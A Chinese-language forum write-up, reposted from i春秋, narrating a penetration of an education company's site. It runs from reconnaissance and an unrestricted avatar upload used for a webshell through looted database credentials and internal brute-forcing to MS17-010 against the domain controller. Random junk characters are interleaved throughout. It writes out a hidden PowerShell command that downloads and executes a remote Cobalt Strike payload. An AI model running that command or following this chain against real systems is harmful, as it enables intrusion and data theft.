4 }% }9 |7 X& i4 G! o 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路% a; N8 k- e- y. k3 J9 }# u+ ~
2 W2 i6 ?6 @9 p( |: }2 {
& P- a3 [ V, v/ }/ x
7 e" l* |# \! h5 o$ X/ k
1 E, w& B& y5 x. ~5 N$ H' Q* \: Y9 x$ Y" s; S
正文
~( _% S5 m- ~, O) q7 _/ o; w4 i
( w$ L a' r& a9 s k7 O% U! b- ^
5 l O! V' U5 U) b. [" l
5 y, D$ O, u9 ^7 Z \
2 m# E- q3 O8 ^8 h8 c7 s$ g7 y% F+ V. _* ]
目标:www.xxxx.com(一家教育机构)
$ _7 I G5 w* k$ A3 ^$ e* [打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
$ R- F6 ~, N0 R- |: ]2 n
, m" e# B) D$ i3 P
/ A) M5 N1 j2 ] }( M: k, v) ~
+ T$ N/ u, T/ t! \! ^% K
2 e3 y9 w9 k. ?: M8 G" q9 z5 T4 c1 Q0 O/ \6 X! `
进行了简单的信息搜集 . C- u5 H7 F0 [/ B2 u E+ z
7 I" i2 q" t2 k6 [+ F; \
- \, k X# D [
: Y( O$ x7 J- x& E: e2 l& P3 u- u% {8 j' y0 [+ l6 R6 ~
子域名搜集
' Q- R: b8 G- w% s * ?- m4 b$ q7 C1 h
" Y2 q. y5 ?* H$ o' Q
/ T* k7 A7 C: y6 O9 P
9 m+ J) ]: w% g- i
' A9 T, L1 c7 z8 d) {8 U) ` fofa找资产
+ \1 ?, @, r% o0 M" N" R 6 r2 N V& A. \3 ^' L1 a! B
. `+ R3 b* ?5 S/ y( w / g0 ^: f$ H9 ~: X9 a
$ N+ \2 t$ c6 ?/ t" o
# v4 S$ [% f- p
/ [. T+ [6 L/ A6 X+ k' Y; \
) j0 \& W+ W. d a0 @+ v- _, l 一共七个资产。去重之后只有两个。
) a0 W6 O M! G# L7 e; Q9 _
( V {3 u$ D* [" T( G; B( W' n% P! ^( t& A
. `6 t2 }( Q& D: N* O v4 r% m3 x" l, D9 b6 _
目录探测+ W% K' L9 u* |" L# Y! `
2 J \3 E1 L/ w* f" `! Q& Y
( E% y: I% Y; N7 ~
% R" }2 Z; I2 M! E6 [
% p1 J' Y" T& a8 W' r C4 H8 I0 P) A7 Y) K( B% @$ }
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 7 w5 L5 B0 `4 U+ S
7 C5 \3 {9 \, k8 o' P1 n2 _
) O4 c6 i4 z+ r& @2 ~
s' R" s. V2 d3 b
2 l. M2 U" r T7 A) _( v7 L 我又尝试了通过修改返回包来绕过登录界面
& U! |( v* l4 ^( g * L& K! ~4 `' c# h7 T0 F
( C# z- H) `4 M/ G5 Z . k) \, Z) L' |6 }; K
, @4 p) c1 l( D3 X
5 u" V9 h1 p0 E: ^) Y+ E N" ~" |3 f/ c 还是不行,尝试注入无果
( a$ E3 g1 U k' m" ]3 ]7 c ! X+ {7 U) x+ f8 |7 Z. e( c
# X5 M$ O( Y8 w: f8 I
+ F* J+ M$ r8 x9 E- L t/ F. W4 r5 R/ T
6 G& e! N0 O% S# M1 _& k: t3 T* E( Y! D E: h& t' [
不过我目录探测出了一处Spring信息泄露 / \ U; K+ h( v
; n# \* Y! i, V# q# {5 I3 k( W6 e' [: Y
9 d' M1 @/ c) B$ n
( [( X3 J9 ]# j8 x7 ], P! K3 v4 x ( n# Z' T4 {' P& `, M" _
I* a6 U0 o" z. L1 l! `
2 d5 o0 [" U+ u3 i
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录7 I3 V! f: C& W2 U+ X( W
$ S# O. C& M( w6 b& K$ g
' f! A8 s5 t4 _/ ]+ h9 K & {: u9 v3 i7 d) d) T2 p, _" G
! x- ?* H$ @ S+ e1 D2 Y" @) c
% Q5 R* t+ S' o1 N2 o7 B+ b 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。: q1 _ z/ ]2 k0 i
" X& {2 e) S3 e4 A l" `
6 x D% |2 b% B: o' z( ?0 Q7 M+ S D6 `* {, P& l# A
E( L+ H) D+ q% t" M
9 ?' [! [3 N- ]- V: t! s1 D. d 获取有些师傅到这一步就手机抓包电脑测了。
/ i2 @; J' A- } ! h$ `- {2 v) E4 P- f l, p
5 } q v! u. ]: W3 W- `( i; O
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
/ F- E- X' J' X . {7 h8 |7 ]6 O _( W$ F
( x8 K: ? e/ C/ l
其中在一个公众号发现了小程序,可以进行注册。
, r0 K4 T# |! b( M& _ 2 m0 e7 g' ]" ?6 l, C( D; q- M
$ z& q' K% V3 f* i+ H 看到了头像上传,尝试上传获取WebShell
4 J8 q9 X/ t" E, l; q0 D ; Z/ `. B7 }, }; Q5 }6 x+ \9 E
6 @+ [& \$ o) b# H) B. \ / L7 c/ M( s* o
# C( _; x' l6 y5 u( h
7 X D2 r8 D* x$ n* f! W( a 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
x- [. F5 I, ?1 d
* {- k; N* N( r& d+ m7 U4 s4 E" I, T4 h o$ c
" E% d; p4 I7 V; |0 E5 Q
' @, c! O' T# b8 e
- k; ]- Y5 E' L8 \ 然后上了大马# ?8 |# x, c5 [6 H. s8 I( @
$ Q+ G( ~ l, ]" {; _& [' h4 C6 H
* w" N2 ` I2 U1 d) e3 G) ` ' W# m$ a- M: @% f5 H
6 B, s3 a' Y2 b
* n' \7 t" k* o' w# h8 Q
, v; S8 l5 K* G ( t6 T/ M( v! H1 B o
5 K4 J. ^$ i; c4 b9 T 通过翻找文件发现数据库账号密码
) H* Q4 D( B2 t6 d/ J
. x% T6 l8 h: G2 [1 U( f S
7 Z+ z) V4 L# @( H c0 D- T. w ; x4 R1 G- m K' M. t" W! Z9 L L
' f4 j, s& q+ Z3 y' U
1 f4 N: T- J3 G1 K
--内网渗透
K" N& ^' s1 }/ r$ c; Y2 J
& M k2 e0 ~. F; F+ o; I/ N& w- X; W# s
直接通过powershell执行 cs上线6 f9 ?# P) s# m7 Z: O& O
* m) s) {+ |& s# j6 ~2 G0 w+ [% M4 o9 K* c* h/ J
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))", H* J& ]" Y; m8 \8 F: ]4 n
4 V; b( L5 w) Y1 q) J* G
4 V* Q: {- v2 O: C7 B
8 Z1 W$ I" ^: Q+ \# h) z" G
$ `. b! ]) t0 r3 W
% G' Y7 O2 w# I 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
; ]8 ]! ^8 W+ @3 e$ Y
9 R& @8 D+ w$ @# m6 d# v. r
, v- q" c, [5 P1 O: d4 _! a" S
& y& B5 P! n9 l6 I, A & T& {: `; i0 @% `* V9 g, _
2 `' ^+ n. {) [$ C8 c8 q: `- H 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
, A4 a1 V; i' ]5 S6 B# i 6 [0 t# z# `7 X, N' }- e- v+ |6 Y
' }' H( E u; t9 \( y
$ E: v: q- q6 s& ^5 Q/ `& ] 9 R! ~1 ]: r9 z2 h- b5 w0 Z
+ i* S1 L$ |& d; F; O+ |& d3 O
2 L) C$ h w2 J1 Z+ G
1 i$ g( Q- k2 |+ Z+ z
- A( P1 `0 d5 T" p, l 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
6 ~8 ~* [( t+ C; G- X
+ M5 B& [9 j- K: ~% I) C% h' j: F" S; y
, c: _- ~( H2 I0 T- H. L
2 R! O4 h9 U% a4 H) p + v) W1 e: d$ b6 J. V
9 q: |! t( ]6 s/ ? A7 B
9 e8 @8 _8 r, @# R, W( I4 M3 x
" o& }; e9 D b6 ~
% X+ m4 ]+ e* O: ^* U) [1 S. p
0 r' y, P, X9 y4 r5 T
7 Z' ^& Q7 k$ S! K3 g" b
% o) V4 w: f0 V& s
) {: x; T' {) k/ N. I3 K, a
$ f; a' |7 K V0 [6 D) G0 F$ z( v$ W4 V1 ~. W
小结
8 X" a7 k7 M6 s * f; i, m0 y& {4 @8 A% z
8 O$ ^5 @5 ~3 k$ ~' ] Q* [
$ n2 @, w* c# I- t
! }( z4 E( r8 \7 Q: c$ B, C
6 f. T4 D; |1 \ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!' T. F8 |' K% A7 v7 g" \+ _( W
4 n I, B4 w3 s8 f" ]+ @
3 f; {$ z; v! x# R# O Y) J) ]
$ O/ w' B4 u5 V: T! o- V+ |2 f 9 r/ q) a: Q. j/ K
! S: W- H, O# T% {8 ^4 Q4 M -
0 M$ Y6 C* R1 s0 d7 O! d
( V2 U* P6 L3 F& ]2 P3 r6 H
7 M0 a: W' _/ n9 w1 q0 U: Z# y -
4 J/ f* ~3 t6 }+ O& y5 t 1 w. [/ ?9 N: L9 c. c
- _7 ] q( D0 F
1 b% h3 Q& _& n+ o# `9 O8 u2 b
% q' w0 y0 k7 Y' ]1 c 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
) Z/ Z$ J. R/ v% q
) e0 d( o/ M; `1 T7 I
5 e% Y# U* ^+ q9 r' d2 v4 n) g
. d* Z0 S8 K& F) r% ~ |